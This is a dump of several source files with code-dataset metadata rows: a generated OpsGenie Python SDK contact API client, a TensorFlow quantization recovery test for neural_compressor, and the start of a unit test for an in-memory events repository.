| 19.285714 | 34 | 0.77037 | 20 | 135 | 5.2 | 0.4 | 0.384615 | 0.653846 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 135 | 6 | 35 | 22.5 | 0.912281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f05ce34276d0fb58f6cf294690b53bad4f04eeab | 30,254 | py | Python | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | null | null | null | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | null | null | null | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | 1 | 2020-11-07T11:27:13.000Z | 2020-11-07T11:27:13.000Z | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opsgenie_swagger.api_client import ApiClient
class ContactApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_contact(self, identifier, **kwargs): # noqa: E501
"""Create Contact # noqa: E501
Creates a new contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param CreateContactPayload body: Request payload of creating contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_contact_with_http_info(identifier, **kwargs) # noqa: E501
else:
(data) = self.create_contact_with_http_info(identifier, **kwargs) # noqa: E501
return data
def create_contact_with_http_info(self, identifier, **kwargs): # noqa: E501
"""Create Contact # noqa: E501
Creates a new contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact_with_http_info(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param CreateContactPayload body: Request payload of creating contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `create_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Delete Contact # noqa: E501
Delete contact using contact id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.delete_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def delete_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Delete Contact # noqa: E501
Delete contact using contact id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `delete_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `delete_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disable_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Disable Contact # noqa: E501
Disable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.disable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.disable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def disable_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Disable Contact # noqa: E501
Disable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disable_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `disable_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `disable_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Enable Contact # noqa: E501
Enable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.enable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.enable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def enable_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Enable Contact # noqa: E501
Enable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `enable_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `enable_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Get Contact # noqa: E501
Returns contact with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: GetContactResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.get_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def get_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Get Contact # noqa: E501
Returns contact with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: GetContactResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `get_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `get_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetContactResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_contacts(self, identifier, **kwargs): # noqa: E501
"""List Contacts # noqa: E501
Returns list of contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_contacts(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:return: ListContactsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_contacts_with_http_info(identifier, **kwargs) # noqa: E501
else:
(data) = self.list_contacts_with_http_info(identifier, **kwargs) # noqa: E501
return data
def list_contacts_with_http_info(self, identifier, **kwargs): # noqa: E501
"""List Contacts # noqa: E501
Returns list of contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_contacts_with_http_info(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:return: ListContactsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_contacts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `list_contacts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListContactsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Update Contact (Partial) # noqa: E501
Update contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:param UpdateContactPayload body: Request payload of update contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.update_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def update_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Update Contact (Partial) # noqa: E501
Update contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:param UpdateContactPayload body: Request payload of update contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `update_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `update_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.446524 | 120 | 0.615026 | 3,414 | 30,254 | 5.22935 | 0.050381 | 0.048843 | 0.037249 | 0.028231 | 0.966224 | 0.963648 | 0.960119 | 0.955862 | 0.952557 | 0.952557 | 0 | 0.016124 | 0.296886 | 30,254 | 747 | 121 | 40.500669 | 0.823148 | 0.332452 | 0 | 0.813433 | 1 | 0 | 0.208553 | 0.040507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037313 | false | 0 | 0.00995 | 0 | 0.10199 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f06bbc410abbefd085b2e7d0bfeef9cc863fdaee | 8,431 | py | Python | test/test_tensorflow_recover.py | huggingface/neural-compressor | aaad4c357a86914ffa583753c9a26d949838a2a5 | [
"Apache-2.0"
] | 172 | 2021-09-14T18:34:17.000Z | 2022-03-30T06:49:53.000Z | test/test_tensorflow_recover.py | intel/lp-opt-tool | 130eefa3586b38df6c0ff78cc8807ae273f6a63f | [
"Apache-2.0"
] | 40 | 2021-09-14T02:26:12.000Z | 2022-03-29T08:34:04.000Z | test/test_tensorflow_recover.py | intel/neural-compressor | 16a4a12045fcb468da4d33769aff2c1a5e2ba6ba | [
"Apache-2.0"
] | 33 | 2021-09-15T07:27:25.000Z | 2022-03-25T08:30:57.000Z | #
# -*- coding: utf-8 -*-
#
import shutil
import unittest
import os
import yaml
import tensorflow as tf
from tensorflow.python.platform import gfile
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import tensor_util
from neural_compressor.adaptor.tf_utils.util import disable_random
def build_fake_yaml():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
evaluation:
accuracy:
metric:
topk: 1
tuning:
accuracy_criterion:
relative: 0.0001
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_2():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
graph_optimization:
precisions: [bf16]
evaluation:
accuracy:
metric:
topk: 1
tuning:
accuracy_criterion:
relative: 0.0001
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_2.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
class TestTensorflowRecover(unittest.TestCase):
@classmethod
def setUpClass(self):
build_fake_yaml()
@classmethod
def tearDownClass(self):
os.remove('fake_yaml.yaml')
os.remove('test.pb')
shutil.rmtree('./saved', ignore_errors=True)
@disable_random()
def test_tensorflow_recover(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_weights_2 = tf.compat.v1.get_variable("weight_2", [3, 8, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
relu = tf.nn.relu(conv)
max_pool = tf.nn.max_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
conv_1 = tf.nn.conv2d(max_pool, conv_weights_2, strides=[
1, 2, 2, 1], padding="VALID", name='conv1_3')
conv_bias = tf.math.add(conv_1, conv_bias)
relu6 = tf.nn.relu6(conv_bias, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
constant_graph = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
with gfile.GFile('./test.pb', "wb") as f:
f.write(constant_graph.SerializeToString())
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./fake_yaml.yaml")
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.model = constant_graph
q_model = quantizer.fit()
from neural_compressor.utils.utility import recover
recover_model = recover('./test.pb', './saved/history.snapshot', 0)
q_model_const_value = {}
for node in q_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if not tensor_value.shape:
q_model_const_value[node.name] = tensor_value
for node in recover_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if node.name in q_model_const_value:
self.assertEqual(tensor_value, q_model_const_value[node.name])
class TestTensorflowRecoverForceBF16(unittest.TestCase):
@classmethod
def setUpClass(self):
os.environ['FORCE_BF16'] = '1'
build_fake_yaml_2()
@classmethod
def tearDownClass(self):
del os.environ['FORCE_BF16']
os.remove('fake_yaml_2.yaml')
os.remove('test.pb')
shutil.rmtree('./saved', ignore_errors=True)
@disable_random()
def test_tensorflow_recover_bf16(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_weights_2 = tf.compat.v1.get_variable("weight_2", [3, 8, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
relu = tf.nn.relu(conv)
max_pool = tf.nn.max_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
conv_1 = tf.nn.conv2d(max_pool, conv_weights_2, strides=[
1, 2, 2, 1], padding="VALID", name='conv1_3')
conv_bias = tf.math.add(conv_1, conv_bias)
relu6 = tf.nn.relu6(conv_bias, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
constant_graph = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
with gfile.GFile('./test.pb', "wb") as f:
f.write(constant_graph.SerializeToString())
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./fake_yaml_2.yaml")
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.model = constant_graph
q_model = quantizer.fit()
found_cast_op = False
from neural_compressor.utils.utility import recover
recover_model = recover('./test.pb', './saved/history.snapshot', 0)
q_model_const_value = {}
for node in q_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if not tensor_value.shape:
q_model_const_value[node.name] = tensor_value
for node in recover_model.graph_def.node:
if node.op == 'Cast':
found_cast_op = True
continue
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if node.name in q_model_const_value:
self.assertEqual(tensor_value, q_model_const_value[node.name])
self.assertEqual(found_cast_op, True)
if __name__ == "__main__":
unittest.main() | 41.945274 | 105 | 0.561855 | 989 | 8,431 | 4.573306 | 0.165824 | 0.031837 | 0.039797 | 0.0283 | 0.87243 | 0.856953 | 0.837497 | 0.837497 | 0.837497 | 0.837497 | 0 | 0.032184 | 0.325584 | 8,431 | 201 | 106 | 41.945274 | 0.763278 | 0.002491 | 0 | 0.806818 | 0 | 0 | 0.149159 | 0.005849 | 0 | 0 | 0 | 0 | 0.017045 | 1 | 0.045455 | false | 0 | 0.073864 | 0 | 0.130682 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8fdfbb955f6b9df50edd50657c7a354287d3f6a | 3,697 | py | Python | test/t1000/unit/infrastructure/persistence/test_events_in_memory_repo.py | helcerion/T1000 | 25684e88dc8adb37fe07ff358f84f797f7b9c716 | [
"MIT"
] | 1 | 2021-08-23T01:33:03.000Z | 2021-08-23T01:33:03.000Z | test/t1000/unit/infrastructure/persistence/test_events_in_memory_repo.py | helcerion/T1000 | 25684e88dc8adb37fe07ff358f84f797f7b9c716 | [
"MIT"
] | 20 | 2019-10-29T10:55:27.000Z | 2022-03-12T00:04:50.000Z | test/t1000/unit/infrastructure/persistence/test_events_in_memory_repo.py | helcerion/T1000 | 25684e88dc8adb37fe07ff358f84f797f7b9c716 | [
"MIT"
] | null | null | null | import unittest
from unittest.mock import patch, Mock
from datetime import datetime
from src.t1000.infrastructure.persistence import EventsInMemoryRepo
class EventsInMemoryRepoTestCase(unittest.TestCase):
def setUp(self):
return super().setUp()
def tearDown(self):
return super().tearDown()
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_date_one_event(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_date('2019-10-16')
event_mock.assert_called_once()
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 1)
